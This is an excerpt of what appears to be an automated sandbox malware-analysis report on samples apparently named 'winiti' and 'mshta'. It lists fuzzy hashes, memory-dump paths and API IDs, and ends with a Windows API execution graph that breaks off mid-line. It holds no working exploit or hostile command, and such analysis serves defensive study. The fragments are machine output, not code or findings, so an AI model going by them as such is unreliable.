                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: SwitchThread
                  • String ID:
                  • API String ID: 115865932-0
                  • Opcode ID: 669846d24bbda5f65c578a588012ee14f3413299c3a7e3c496bd00c502c477b6
                  • Instruction ID: 1746e6d1a80f282612aade66b251f0f8645166d82f9d2dd4e739f107e5651129
                  • Opcode Fuzzy Hash: 669846d24bbda5f65c578a588012ee14f3413299c3a7e3c496bd00c502c477b6
                  • Instruction Fuzzy Hash: 6941E432F1165681EFA48B3BC0413ED6290E748F98F95857EEA46877F9DA3CCA438741
                  Function 000000013FDF1BED Relevance: 6.1, APIs: 4, Instructions: 119threadCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: SwitchThread
                  • String ID:
                  • API String ID: 115865932-0
                  • Opcode ID: ea4baac3568b8008df20d653752b465ece59447f5b54120d8eb719c92615070f
                  • Instruction ID: 422711571ba7822f77da8ce2d539d964d47a7e6ce41b5eb22f4c019c2d49bf5c
                  • Opcode Fuzzy Hash: ea4baac3568b8008df20d653752b465ece59447f5b54120d8eb719c92615070f
                  • Instruction Fuzzy Hash: C5517131F1470146F3569BA69989FEA33D4AF487A4F14423DFA06C32E1DB39DA4BD601
                  Function 000000013FE0F060 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: BreakDebug
                  • String ID:
                  • API String ID: 456121617-0
                  • Opcode ID: 21388db3ff23c23bfe290b02463c8e984ea9257b12978aae731d96e3086609a7
                  • Instruction ID: 91afad54c3724b9a709d560aa616d1c1621324f66a873d2b447c82e94046b3fc
                  • Opcode Fuzzy Hash: 21388db3ff23c23bfe290b02463c8e984ea9257b12978aae731d96e3086609a7
                  • Instruction Fuzzy Hash: 2F41D432A057C581FA619F52E1003EEABE1E758B98F1B003DDE49173A6DB74CAA3C341
                  Function 000000013FDFD200 Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: BreakDebug
                  • String ID:
                  • API String ID: 456121617-0
                  • Opcode ID: a762ba7bdb9e68b543346d8befee5f14f7d2aaaa5ecc6a7732aa10b9ae04d0ef
                  • Instruction ID: 115b119365221caf15a79ee139665874aa6690dd15874f8290ee5322045a383e
                  • Opcode Fuzzy Hash: a762ba7bdb9e68b543346d8befee5f14f7d2aaaa5ecc6a7732aa10b9ae04d0ef
                  • Instruction Fuzzy Hash: 8E31C532A01B4482EA259F95A1487DDF7E4F796B98F08013CEF49477D9CF78CA468340
                  Function 000000013FDDAD00 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: ErrorLastMultipleWait$HandlesObjects
                  • String ID:
                  • API String ID: 2817213684-0
                  • Opcode ID: 1b63c40e6d013145cedae492ad8f21b5e2360a6dd9ad6664cb5addbe83128acf
                  • Instruction ID: 49ec30e371c030a354f532bd614b9db0f405832a83b4992f8126cafa3ca7afdd
                  • Opcode Fuzzy Hash: 1b63c40e6d013145cedae492ad8f21b5e2360a6dd9ad6664cb5addbe83128acf
                  • Instruction Fuzzy Hash: 31118232A08A5483D7244B6AB40435AB7A5FB44795F14413DFEC947BE5DF38C6428B40
                  Function 000000013FE3955C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                  • String ID:
                  • API String ID: 2933794660-0
                  • Opcode ID: efb2c1910f7fe4eb1fdb9db6ef462f9c960acadc62b879df81811dfe8f91f112
                  • Instruction ID: 31028eb2359e75b63a3022b5c6168ecf75a32af80d7fb7f1a30c0e27b1f87b84
                  • Opcode Fuzzy Hash: efb2c1910f7fe4eb1fdb9db6ef462f9c960acadc62b879df81811dfe8f91f112
                  • Instruction Fuzzy Hash: 2711E836B11B048AEB009F71E8553E933A4F759BA8F441A35EF6D867A4EF78C1958340
                  Function 000000013FE3A8E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,000000013FE39A6B), ref: 000000013FE3A930
                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000000013FE39A6B), ref: 000000013FE3A971
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: ExceptionFileHeaderRaise
                  • String ID: csm
                  • API String ID: 2573137834-1018135373
                  • Opcode ID: aa4e29ff740041cbb66bd2c147c1e0abea6c0f4e7f03852bd6b62dcdd7bd4198
                  • Instruction ID: 898eb3db3ab716e6f69f385de511f4da01fc39c2c03eecf41231e21ab87eb2ba
                  • Opcode Fuzzy Hash: aa4e29ff740041cbb66bd2c147c1e0abea6c0f4e7f03852bd6b62dcdd7bd4198
                  • Instruction Fuzzy Hash: 70112B36614B8482EB618F25F44439977E5F788B94F594239DF8C57B68DF38C6528B00
                  Function 000000013FDF3E10 Relevance: 5.1, APIs: 4, Instructions: 53COMMON
                  Download Yara Rule
                  APIs
                  • EnterCriticalSection.KERNEL32(?,?,00000000,000000013FDF3F8F,?,?,?,000000013FE0025A), ref: 000000013FDF3E5A
                  • LeaveCriticalSection.KERNEL32(?,?,00000000,000000013FDF3F8F,?,?,?,000000013FE0025A), ref: 000000013FDF3E9C
                  • EnterCriticalSection.KERNEL32(?,?,00000000,000000013FDF3F8F,?,?,?,000000013FE0025A), ref: 000000013FDF3EC7
                  • LeaveCriticalSection.KERNEL32(?,?,00000000,000000013FDF3F8F,?,?,?,000000013FE0025A), ref: 000000013FDF3EE8
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID:
                  • API String ID: 3168844106-0
                  • Opcode ID: 76d884de7bf17c7811e84ddf0ad67568b996faf9851ca8ebb35a4ad0458fe3ff
                  • Instruction ID: 54c7539f169c7a4b23b867fec7a10be4e48d413712afd09cf844683ceacd9fe7
                  • Opcode Fuzzy Hash: 76d884de7bf17c7811e84ddf0ad67568b996faf9851ca8ebb35a4ad0458fe3ff
                  • Instruction Fuzzy Hash: 5A211D71A14A0581EA53DF26EDC43E623B0EB193E0F881239E629476F5DB7DC69AC300

                  Executed Functions

                  Function 03000FB9 Relevance: .0, Instructions: 5COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000010.00000003.473025678.0000000003000000.00000010.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_3_3000000_mshta.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                  • Instruction ID: 28386c967f9631685869d8790586bd37d486a07ae1dbea4e103c843acdc23c49
                  • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                  • Instruction Fuzzy Hash:
                  Function 03000FC1 Relevance: .0, Instructions: 5COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000010.00000003.473025678.0000000003000000.00000010.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_3_3000000_mshta.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                  • Instruction ID: 28386c967f9631685869d8790586bd37d486a07ae1dbea4e103c843acdc23c49
                  • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                  • Instruction Fuzzy Hash:

                  Execution Graph

                  Execution Coverage:6.6%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:0%
                  Total number of Nodes:912
                  Total number of Limit Nodes:26
                  execution_graph 15564 13f5ffe40 15565 13f5ffe5a 15564->15565 15566 13f5ffe65 15564->15566 15567 13f5ffe92 VirtualAlloc 15566->15567 15572 13f5ffee6 15566->15572 15568 13f5ffecd 15567->15568 15567->15572 15573 13f658fd0 15568->15573 15571 13f5fff31 VirtualFree 15571->15572 15576 13f658ed4 15573->15576 15577 13f658eee malloc 15576->15577 15578 13f5ffede 15577->15578 15579 13f658edf 15577->15579 15578->15571 15578->15572 15579->15577 15580 13f658efe 15579->15580 15581 13f658f09 15580->15581 15585 13f659a2c 15580->15585 15589 13f659a4c 15581->15589 15586 13f659a3a std::bad_alloc::bad_alloc 15585->15586 15593 13f65a8e0 15586->15593 15588 13f659a4b 15590 13f659a5a std::bad_alloc::bad_alloc 15589->15590 15591 13f65a8e0 Concurrency::cancel_current_task 2 API calls 15590->15591 15592 13f658f0f 15591->15592 15594 13f65a8ff 15593->15594 15595 13f65a928 RtlPcToFileHeader 15594->15595 15596 13f65a94a RaiseException 15594->15596 15597 13f65a940 15595->15597 15596->15588 15597->15596 15598 13f5f5760 15628 13f5fb020 FlsAlloc 15598->15628 15600 13f5f58ce 15601 13f5f576b 15601->15600 15641 13f5faec0 GetModuleHandleExW 15601->15641 15603 13f5f578b 15642 13f5f7110 15603->15642 15605 13f5f5793 15605->15600 15650 13f5fb750 15605->15650 15609 13f5f57b0 15609->15600 15610 13f5f57d8 RtlAddVectoredExceptionHandler 15609->15610 15611 13f5f57ec 15610->15611 15612 13f5f57f1 15610->15612 15614 13f5f5825 15611->15614 15615 13f5fd7b0 9 API calls 15611->15615 15687 13f5fd7b0 15612->15687 15616 13f5f587f 15614->15616 15664 13f5fdf20 15614->15664 15615->15614 15672 13f5f9f40 15616->15672 15619 13f5f5884 15619->15600 15693 13f5f5410 15619->15693 15629 13f5fb040 15628->15629 15630 13f5fb16e 15628->15630 15704 13f603910 15629->15704 15630->15601 15632 13f5fb045 15633 13f6026b0 10 API calls 15632->15633 15634 13f5fb04a 15633->15634 15634->15630 15635 13f5fd7b0 9 API calls 15634->15635 15636 13f5fb072 15635->15636 15637 13f5fb09a GetCurrentProcess GetProcessAffinityMask 15636->15637 15638 13f5fb091 15636->15638 15640 13f5fb108 15636->15640 15637->15638 15639 13f5fb0e4 QueryInformationJobObject 15638->15639 15639->15640 15640->15601 15641->15603 15643 13f658fd0 _swprintf_c_l 3 API calls 15642->15643 15644 13f5f7125 15643->15644 15645 13f5f7164 15644->15645 15857 13f5ffdc0 15644->15857 15645->15605 15647 13f5f7132 15647->15645 15648 13f5fb410 InitializeCriticalSectionEx 15647->15648 15649 13f5f715d 15648->15649 15649->15605 15651 13f5fb410 InitializeCriticalSectionEx 15650->15651 15652 13f5f57a0 15651->15652 15652->15600 15653 13f5f6b50 15652->15653 15654 13f658fd0 _swprintf_c_l 3 API calls 15653->15654 15655 13f5f6b6e 15654->15655 15656 13f5f6c0a 15655->15656 15860 13f5f4d60 15655->15860 15656->15609 15658 13f5f6ba0 15659 13f5f6bea 15658->15659 15867 13f5f4e50 15658->15867 15659->15609 15661 13f5f6bad 15663 13f5f6bbd ISource 15661->15663 15871 13f5f4be0 15661->15871 15663->15609 15665 13f5fdf4b 15664->15665 15671 13f5fdff6 15664->15671 15666 13f658fd0 _swprintf_c_l 3 API calls 15665->15666 15667 13f5fdf6a 15666->15667 15668 13f5fb410 InitializeCriticalSectionEx 15667->15668 15669 13f5fdf95 15668->15669 15670 13f5fdfde GetSystemTimeAsFileTime 15669->15670 15670->15671 15671->15616 15673 13f6589ab 15672->15673 15674 13f5f9f79 EventRegister 15673->15674 15675 13f5f9ffc 15674->15675 15677 13f5f9ff7 15674->15677 15676 13f5fd7b0 9 API calls 15675->15676 15676->15677 15876 13f5fa820 15677->15876 15680 13f5fa074 15680->15619 15681 13f5fa04b 15681->15680 15894 13f5f6960 15681->15894 15683 13f5fa054 15683->15680 15901 13f5fe9d0 15683->15901 15684 13f5fa064 15684->15619 15690 13f5fd820 15687->15690 15688 13f658fb0 8 API calls 15691 13f5fd99d 15688->15691 15689 13f5fd8a0 _wcsicmp 15689->15690 15692 13f5fd8bd 15689->15692 15690->15689 15690->15692 15691->15611 15692->15688 15697 13f5f543a 15693->15697 15701 13f5f559b 15693->15701 15694 13f5f5726 15694->15600 15702 13f5fb410 15694->15702 15696 13f5f571a RaiseFailFastException 15696->15694 15697->15701 16181 13f5fb1d0 LoadLibraryExW 15697->16181 15699 13f5f5516 15699->15701 16184 13f5fb180 LoadLibraryExW 15699->16184 15701->15694 16187 13f5fb220 15701->16187 15703 13f658bd9 InitializeCriticalSectionEx 15702->15703 15831 13f5f9b90 15704->15831 15707 13f5f9b90 9 API calls 15708 13f60394e 15707->15708 15709 13f5f9b90 9 API calls 15708->15709 15710 13f603969 15709->15710 15711 13f5f9b90 9 API calls 15710->15711 15712 13f603984 15711->15712 15713 13f5f9b90 9 API calls 15712->15713 15714 13f6039a4 15713->15714 15715 13f5f9b90 9 API calls 15714->15715 15716 13f6039bf 15715->15716 15717 13f5f9b90 9 API calls 15716->15717 15718 13f6039df 15717->15718 15719 13f5f9b90 9 API calls 15718->15719 15720 13f6039fa 15719->15720 15721 13f5f9b90 9 API calls 15720->15721 15722 13f603a15 15721->15722 15723 13f5f9b90 9 API calls 15722->15723 15724 13f603a30 15723->15724 15725 13f5f9b90 9 API calls 15724->15725 15726 13f603a50 15725->15726 15727 13f5f9b90 9 API calls 15726->15727 15728 13f603a70 15727->15728 15837 13f5f9d50 15728->15837 15731 13f5f9d50 9 API calls 15732 13f603aa0 15731->15732 15733 13f5f9d50 9 API calls 15732->15733 15734 13f603ab5 15733->15734 15735 13f5f9d50 9 API calls 15734->15735 15736 13f603aca 15735->15736 15737 13f5f9d50 9 API calls 15736->15737 15738 13f603adf 15737->15738 15739 13f5f9d50 9 API calls 15738->15739 15740 13f603af9 15739->15740 15741 13f5f9d50 9 API calls 15740->15741 15742 13f603b0e 15741->15742 15743 13f5f9d50 9 API calls 15742->15743 15744 13f603b23 15743->15744 15745 13f5f9d50 9 API calls 15744->15745 15746 13f603b38 15745->15746 15747 13f5f9d50 9 API calls 15746->15747 15748 13f603b4d 15747->15748 15749 13f5f9d50 9 API calls 15748->15749 15750 13f603b62 15749->15750 15751 13f5f9d50 9 API calls 15750->15751 15752 13f603b77 15751->15752 15753 13f5f9d50 9 API calls 15752->15753 15754 13f603b91 15753->15754 15755 13f5f9d50 9 API calls 15754->15755 15756 13f603bab 15755->15756 15757 13f5f9d50 9 API calls 15756->15757 15758 13f603bc0 15757->15758 15759 13f5f9d50 9 API calls 15758->15759 15760 13f603bd5 15759->15760 15761 13f5f9d50 9 API calls 15760->15761 15762 13f603bea 15761->15762 15763 13f5f9d50 9 API calls 15762->15763 15764 13f603bff 15763->15764 15765 13f5f9d50 9 API calls 15764->15765 15766 13f603c19 15765->15766 15767 13f5f9d50 9 API calls 15766->15767 15768 13f603c33 15767->15768 15769 13f5f9d50 9 API calls 15768->15769 15770 13f603c48 15769->15770 15771 13f5f9d50 9 API calls 15770->15771 15772 13f603c5d 15771->15772 15773 13f5f9d50 9 API calls 15772->15773 15774 13f603c72 15773->15774 15775 13f5f9d50 9 API calls 15774->15775 15776 13f603c87 15775->15776 15777 13f5f9d50 9 API calls 15776->15777 15778 13f603c9c 15777->15778 15779 13f5f9d50 9 API calls 15778->15779 15780 13f603cb1 15779->15780 15781 13f5f9d50 9 API calls 15780->15781 15782 13f603cc6 15781->15782 15783 13f5f9d50 9 API calls 15782->15783 15784 13f603cdb 15783->15784 15785 13f5f9d50 9 API calls 15784->15785 15786 13f603cf0 15785->15786 15787 13f5f9d50 9 API calls 15786->15787 15788 13f603d05 15787->15788 15789 13f5f9d50 9 API calls 15788->15789 15790 13f603d1a 15789->15790 15791 13f5f9d50 9 API calls 15790->15791 15792 13f603d2f 15791->15792 15793 13f5f9d50 9 API calls 15792->15793 15794 13f603d44 15793->15794 15795 13f5f9d50 9 API calls 15794->15795 15796 13f603d59 15795->15796 15797 13f5f9d50 9 API calls 15796->15797 15798 13f603d6e 15797->15798 15799 13f5f9d50 9 API calls 15798->15799 15800 13f603d83 15799->15800 15801 13f5f9d50 9 API calls 15800->15801 15802 13f603d98 15801->15802 15803 13f5f9d50 9 API calls 15802->15803 15804 13f603dad 15803->15804 15805 13f5f9d50 9 API calls 15804->15805 15806 13f603dc2 15805->15806 15807 13f5f9d50 9 API calls 15806->15807 15808 13f603dd7 15807->15808 15809 13f5f9d50 9 API calls 15808->15809 15810 13f603dec 15809->15810 15811 13f5f9d50 9 API calls 15810->15811 15812 13f603e01 15811->15812 15813 13f5f9d50 9 API calls 15812->15813 15814 13f603e16 15813->15814 15815 13f5f9d50 9 API calls 15814->15815 15816 13f603e30 15815->15816 15817 13f5f9d50 9 API calls 15816->15817 15818 13f603e4a 15817->15818 15819 13f5f9d50 9 API calls 15818->15819 15820 13f603e64 15819->15820 15821 13f5f9d50 9 API calls 15820->15821 15822 13f603e7e 15821->15822 15823 13f5f9d50 9 API calls 15822->15823 15824 13f603e98 15823->15824 15825 13f5f9d50 9 API calls 15824->15825 15826 13f603eb2 15825->15826 15827 13f5f9d50 9 API calls 15826->15827 15828 13f603ec7 15827->15828 15829 13f5f9d50 9 API calls 15828->15829 15830 13f603ee1 15829->15830 15832 13f5f9bc3 15831->15832 15833 13f5f9bc7 15832->15833 15836 13f5fd7b0 9 API calls 15832->15836 15843 13f658fb0 15833->15843 15836->15833 15840 13f5f9d80 15837->15840 15838 13f5fd7b0 9 API calls 15839 13f5f9e98 15838->15839 15841 13f658fb0 8 API calls 15839->15841 15840->15838 15840->15840 15842 13f5f9eb0 15841->15842 15842->15731 15844 13f658fb9 15843->15844 15845 13f5f9cfe 15844->15845 15846 13f659abc IsProcessorFeaturePresent 15844->15846 15845->15707 15847 13f659ad4 15846->15847 15852 13f659b90 RtlCaptureContext 15847->15852 15853 13f659baa RtlLookupFunctionEntry 15852->15853 15854 13f659bc0 RtlVirtualUnwind 15853->15854 15855 13f659ae7 15853->15855 15854->15853 15854->15855 15856 13f659a88 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15855->15856 15858 13f5fb410 InitializeCriticalSectionEx 15857->15858 15859 13f5ffe0c 15858->15859 15859->15647 15861 13f658fd0 _swprintf_c_l 3 API calls 15860->15861 15862 13f5f4d7e 15861->15862 15863 13f5fb410 InitializeCriticalSectionEx 15862->15863 15865 13f5f4db0 15862->15865 15863->15865 15864 13f5f4e08 ISource 15864->15658 15865->15864 15874 13f5fb3f0 15865->15874 15868 13f5f4e66 ISource 15867->15868 15869 13f5f4e55 15867->15869 15868->15661 15870 13f5fb3f0 DeleteCriticalSection 15869->15870 15870->15868 15872 13f5fb3f0 15871->15872 15872->15663 15873 13f658a4d DeleteCriticalSection 15872->15873 15874->15864 15875 13f658a4d DeleteCriticalSection 15874->15875 15911 13f601d60 15876->15911 15878 13f5fa037 15878->15680 15879 13f609140 15878->15879 15922 13f5fe020 15879->15922 15883 13f60915e 15884 13f6091d9 15883->15884 15929 13f602260 15883->15929 15893 13f60944b ISource 15884->15893 15943 13f61f640 15884->15943 15887 13f60964c 15888 13f658fd0 _swprintf_c_l 3 API calls 15887->15888 15887->15893 15889 13f609782 15888->15889 15889->15893 15966 13f601eb0 15889->15966 15891 13f6097ad 15971 13f61de20 15891->15971 15893->15681 15895 13f5f6972 15894->15895 15896 13f5f69ad 15895->15896 16158 13f5ffc70 CreateEventW 15895->16158 15896->15683 15898 13f5f6984 15898->15896 16159 13f5fb320 CreateThread 15898->16159 15900 13f5f69a3 15900->15683 15902 13f5fe9e7 15901->15902 15903 13f5fe9ef 15902->15903 15904 13f658fd0 _swprintf_c_l 3 API calls 15902->15904 15903->15684 15908 13f5fea21 15904->15908 15905 13f5feb58 ISource 15905->15684 15907 13f5feaf2 ISource 15907->15684 15908->15905 15909 13f5feab5 ISource 15908->15909 16162 13f604350 15908->16162 15909->15907 16168 13f6045e0 15909->16168 15916 13f604c20 15911->15916 15915 13f601d9f 15915->15878 15917 13f658fd0 _swprintf_c_l 3 API calls 15916->15917 15918 13f601d88 15917->15918 15918->15915 15919 13f606770 15918->15919 15920 13f658fd0 _swprintf_c_l 3 API calls 15919->15920 15921 13f606785 15920->15921 15921->15915 15923 13f5fe0cc 15922->15923 15925 13f5fe05b 15922->15925 15928 13f6028a0 QueryPerformanceFrequency 15923->15928 15925->15923 15927 13f5fe094 15925->15927 15994 13f5fdd40 15925->15994 15927->15923 16002 13f5fe0e0 15927->16002 15928->15883 15930 13f602283 15929->15930 15931 13f602297 GetCurrentProcess IsProcessInJob 15930->15931 15937 13f6023d4 15930->15937 15932 13f602393 15931->15932 15933 13f6022ec 15931->15933 15932->15937 15938 13f6023ab GlobalMemoryStatusEx 15932->15938 15933->15932 15936 13f6022f6 QueryInformationJobObject 15933->15936 15934 13f602422 GlobalMemoryStatusEx 15935 13f602418 15934->15935 15939 13f658fb0 8 API calls 15935->15939 15936->15932 15940 13f602318 15936->15940 15937->15934 15937->15935 15938->15937 15941 13f602464 15939->15941 15940->15932 15942 13f60235c GlobalMemoryStatusEx 15940->15942 15941->15884 15942->15932 16011 13f6028f0 VirtualAlloc 15943->16011 15945 13f61f662 15946 13f61f6c7 15945->15946 16087 13f602690 InitializeCriticalSection 15945->16087 15948 13f61fabd 15946->15948 16014 13f630410 15946->16014 15950 13f61f6f1 _swprintf_c_l 15965 13f61f933 15950->15965 16024 13f61f340 15950->16024 15952 13f61f8c8 16028 13f61ce10 15952->16028 15956 13f61f902 15956->15965 16035 13f61fae0 15956->16035 15959 13f61f928 16088 13f6029e0 VirtualFree 15959->16088 15961 13f61f957 15961->15965 16049 13f6330a0 15961->16049 15965->15887 15967 13f658fd0 _swprintf_c_l 3 API calls 15966->15967 15968 13f601ed6 15967->15968 15969 13f601ede CreateEventW 15968->15969 15970 13f601f00 ISource 15968->15970 15969->15970 15970->15891 15972 13f61deaa _swprintf_c_l 15971->15972 15973 13f601eb0 4 API calls 15972->15973 15974 13f61deb8 15973->15974 15984 13f61e717 15974->15984 16136 13f602880 QueryPerformanceCounter 15974->16136 15977 13f61ded6 15978 13f61e246 15977->15978 15977->15984 16137 13f621660 15977->16137 15979 13f621660 9 API calls 15978->15979 15980 13f61e279 15979->15980 15981 13f621660 9 API calls 15980->15981 15980->15984 15982 13f61e2b8 15981->15982 15983 13f658fd0 _swprintf_c_l 3 API calls 15982->15983 15982->15984 15985 13f61e581 15983->15985 15984->15893 15985->15984 15986 13f61e5e4 15985->15986 15987 13f61e5cd 15985->15987 15988 13f658fd0 _swprintf_c_l 3 API calls 15986->15988 15987->15984 15990 13f61e5da DebugBreak 15987->15990 15989 13f61e630 15988->15989 15989->15984 15991 13f658fd0 _swprintf_c_l 3 